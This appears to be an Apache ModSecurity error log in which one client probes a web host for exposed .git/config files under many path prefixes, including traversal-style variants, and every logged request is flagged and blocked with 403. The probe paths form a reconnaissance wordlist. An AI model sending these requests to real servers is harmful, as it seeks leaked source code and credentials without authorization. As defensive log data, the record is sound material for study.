[Sat Jul 29 05:51:00.805291 2023] [:error] [pid 1028943] [client 18.222.143.90:45280] [client 18.222.143.90] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/data/.git/config"] [unique_id "ZMSMpPYvMCMU4h3nTuI_PwAAAAY"]
[Sat Jul 29 05:51:00.805751 2023] [:error] [pid 1026830] [client 18.222.143.90:45162] [client 18.222.143.90] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /flock/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/flock/.git/config"] [unique_id "ZMSMpK0f8dGtNkSGjNsx1AAAAAE"]
[Sat Jul 29 05:51:00.805910 2023] [:error] [pid 1026830] [client 18.222.143.90:45162] [client 18.222.143.90] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/flock/.git/config"] [unique_id "ZMSMpK0f8dGtNkSGjNsx1AAAAAE"]
[Sat Jul 29 05:51:00.806034 2023] [:error] [pid 1026830] [client 18.222.143.90:45162] [client 18.222.143.90] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/flock/.git/config"] [unique_id "ZMSMpK0f8dGtNkSGjNsx1AAAAAE"]
[Sat Jul 29 05:51:00.806407 2023] [:error] [pid 1029471] [client 18.222.143.90:45176] [client 18.222.143.90] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /gateway/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/gateway/.git/config"] [unique_id "ZMSMpK7_UrsKgyKvoFRz5gAAAAg"]
[Sat Jul 29 05:51:00.806661 2023] [:error] [pid 1029471] [client 18.222.143.90:45176] [client 18.222.143.90] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/gateway/.git/config"] [unique_id "ZMSMpK7_UrsKgyKvoFRz5gAAAAg"]
[Sat Jul 29 05:51:00.806841 2023] [:error] [pid 1029471] [client 18.222.143.90:45176] [client 18.222.143.90] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/gateway/.git/config"] [unique_id "ZMSMpK7_UrsKgyKvoFRz5gAAAAg"]
[Sat Jul 29 05:51:00.808595 2023] [:error] [pid 1026829] [client 18.222.143.90:44980] [client 18.222.143.90] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /git/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/git/.git/config"] [unique_id "ZMSMpFa-sNsZ5n7HAcWNpgAAAAA"]
[Sat Jul 29 05:51:00.808850 2023] [:error] [pid 1026829] [client 18.222.143.90:44980] [client 18.222.143.90] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/git/.git/config"] [unique_id "ZMSMpFa-sNsZ5n7HAcWNpgAAAAA"]
[Sat Jul 29 05:51:00.809031 2023] [:error] [pid 1026829] [client 18.222.143.90:44980] [client 18.222.143.90] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/git/.git/config"] [unique_id "ZMSMpFa-sNsZ5n7HAcWNpgAAAAA"]
[Sat Jul 29 05:51:00.909049 2023] [:error] [pid 1026832] [client 18.222.143.90:45316] [client 18.222.143.90] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /repository/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/repository/.git/config"] [unique_id "ZMSMpBLEJHbrIXm2t_mCEgAAAAM"]
[Sat Jul 29 05:51:00.909292 2023] [:error] [pid 1026832] [client 18.222.143.90:45316] [client 18.222.143.90] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/repository/.git/config"] [unique_id "ZMSMpBLEJHbrIXm2t_mCEgAAAAM"]
[Sat Jul 29 05:51:00.909472 2023] [:error] [pid 1026832] [client 18.222.143.90:45316] [client 18.222.143.90] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/repository/.git/config"] [unique_id "ZMSMpBLEJHbrIXm2t_mCEgAAAAM"]
[Sat Jul 29 05:51:00.980743 2023] [:error] [pid 1026831] [client 18.222.143.90:45248] [client 18.222.143.90] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/assets../.git/config"] [unique_id "ZMSMpNUbAgB5eIusnpmUXwAAAAI"]
[Sat Jul 29 05:51:00.980989 2023] [:error] [pid 1026831] [client 18.222.143.90:45248] [client 18.222.143.90] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/assets../.git/config"] [unique_id "ZMSMpNUbAgB5eIusnpmUXwAAAAI"]
[Sat Jul 29 05:51:00.981156 2023] [:error] [pid 1026831] [client 18.222.143.90:45248] [client 18.222.143.90] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/assets../.git/config"] [unique_id "ZMSMpNUbAgB5eIusnpmUXwAAAAI"]
[Sat Jul 29 05:51:01.032991 2023] [authz_core:error] [pid 1029094] [client 18.222.143.90:45016] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/vendor/.git
[Sat Jul 29 05:51:01.033621 2023] [:error] [pid 1026837] [client 18.222.143.90:45224] [client 18.222.143.90] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/static../.git/config"] [unique_id "ZMSMpaNEleSPIL4joq5epgAAAAU"]
[Sat Jul 29 05:51:01.033886 2023] [:error] [pid 1026837] [client 18.222.143.90:45224] [client 18.222.143.90] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/static../.git/config"] [unique_id "ZMSMpaNEleSPIL4joq5epgAAAAU"]
[Sat Jul 29 05:51:01.034033 2023] [:error] [pid 1026837] [client 18.222.143.90:45224] [client 18.222.143.90] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/static../.git/config"] [unique_id "ZMSMpaNEleSPIL4joq5epgAAAAU"]
[Sat Jul 29 05:51:01.037002 2023] [:error] [pid 1026833] [client 18.222.143.90:45344] [client 18.222.143.90] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/events../.git/config"] [unique_id "ZMSMpZI37g2UFZcDSq72OgAAAAQ"]
[Sat Jul 29 05:51:01.038481 2023] [:error] [pid 1028943] [client 18.222.143.90:45056] [client 18.222.143.90] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /test/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/test/.git/config"] [unique_id "ZMSMpfYvMCMU4h3nTuI_QAAAAAY"]
[Sat Jul 29 05:51:01.038788 2023] [:error] [pid 1026830] [client 18.222.143.90:45078] [client 18.222.143.90] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /wp-content/themes/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/wp-content/themes/.git/config"] [unique_id "ZMSMpa0f8dGtNkSGjNsx1QAAAAE"]
[Sat Jul 29 05:51:01.038814 2023] [:error] [pid 1028943] [client 18.222.143.90:45056] [client 18.222.143.90] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/test/.git/config"] [unique_id "ZMSMpfYvMCMU4h3nTuI_QAAAAAY"]
[Sat Jul 29 05:51:01.038998 2023] [:error] [pid 1026830] [client 18.222.143.90:45078] [client 18.222.143.90] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/wp-content/themes/.git/config"] [unique_id "ZMSMpa0f8dGtNkSGjNsx1QAAAAE"]
[Sat Jul 29 05:51:01.039006 2023] [:error] [pid 1028943] [client 18.222.143.90:45056] [client 18.222.143.90] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/test/.git/config"] [unique_id "ZMSMpfYvMCMU4h3nTuI_QAAAAAY"]
[Sat Jul 29 05:51:01.039143 2023] [:error] [pid 1026830] [client 18.222.143.90:45078] [client 18.222.143.90] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/wp-content/themes/.git/config"] [unique_id "ZMSMpa0f8dGtNkSGjNsx1QAAAAE"]
[Sat Jul 29 05:51:01.039691 2023] [:error] [pid 1026833] [client 18.222.143.90:45344] [client 18.222.143.90] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/events../.git/config"] [unique_id "ZMSMpZI37g2UFZcDSq72OgAAAAQ"]
[Sat Jul 29 05:51:01.039826 2023] [:error] [pid 1026833] [client 18.222.143.90:45344] [client 18.222.143.90] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/events../.git/config"] [unique_id "ZMSMpZI37g2UFZcDSq72OgAAAAQ"]
[Sat Jul 29 05:51:01.041155 2023] [:error] [pid 1029471] [client 18.222.143.90:45184] [client 18.222.143.90] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /common/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/common/.git/config"] [unique_id "ZMSMpa7_UrsKgyKvoFRz5wAAAAg"]
[Sat Jul 29 05:51:01.041376 2023] [:error] [pid 1029471] [client 18.222.143.90:45184] [client 18.222.143.90] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/common/.git/config"] [unique_id "ZMSMpa7_UrsKgyKvoFRz5wAAAAg"]
[Sat Jul 29 05:51:01.041502 2023] [:error] [pid 1029471] [client 18.222.143.90:45184] [client 18.222.143.90] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/common/.git/config"] [unique_id "ZMSMpa7_UrsKgyKvoFRz5wAAAAg"]
[Sat Jul 29 05:51:01.046153 2023] [:error] [pid 1026829] [client 18.222.143.90:45320] [client 18.222.143.90] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/lib../.git/config"] [unique_id "ZMSMpVa-sNsZ5n7HAcWNpwAAAAA"]
[Sat Jul 29 05:51:01.046421 2023] [:error] [pid 1026829] [client 18.222.143.90:45320] [client 18.222.143.90] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/lib../.git/config"] [unique_id "ZMSMpVa-sNsZ5n7HAcWNpwAAAAA"]
[Sat Jul 29 05:51:01.046577 2023] [:error] [pid 1026829] [client 18.222.143.90:45320] [client 18.222.143.90] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/lib../.git/config"] [unique_id "ZMSMpVa-sNsZ5n7HAcWNpwAAAAA"]
[Sat Jul 29 05:51:01.145027 2023] [:error] [pid 1026832] [client 18.222.143.90:45200] [client 18.222.143.90] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /v2/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/v2/.git/config"] [unique_id "ZMSMpRLEJHbrIXm2t_mCEwAAAAM"]
[Sat Jul 29 05:51:01.145268 2023] [:error] [pid 1026832] [client 18.222.143.90:45200] [client 18.222.143.90] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/v2/.git/config"] [unique_id "ZMSMpRLEJHbrIXm2t_mCEwAAAAM"]
[Sat Jul 29 05:51:01.145438 2023] [:error] [pid 1026832] [client 18.222.143.90:45200] [client 18.222.143.90] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/v2/.git/config"] [unique_id "ZMSMpRLEJHbrIXm2t_mCEwAAAAM"]
[Sat Jul 29 05:51:01.217155 2023] [:error] [pid 1026831] [client 18.222.143.90:45230] [client 18.222.143.90] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /wp-content/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/wp-content/.git/config"] [unique_id "ZMSMpdUbAgB5eIusnpmUYAAAAAI"]
[Sat Jul 29 05:51:01.217407 2023] [:error] [pid 1026831] [client 18.222.143.90:45230] [client 18.222.143.90] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/wp-content/.git/config"] [unique_id "ZMSMpdUbAgB5eIusnpmUYAAAAAI"]
[Sat Jul 29 05:51:01.217562 2023] [:error] [pid 1026831] [client 18.222.143.90:45230] [client 18.222.143.90] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/wp-content/.git/config"] [unique_id "ZMSMpdUbAgB5eIusnpmUYAAAAAI"]
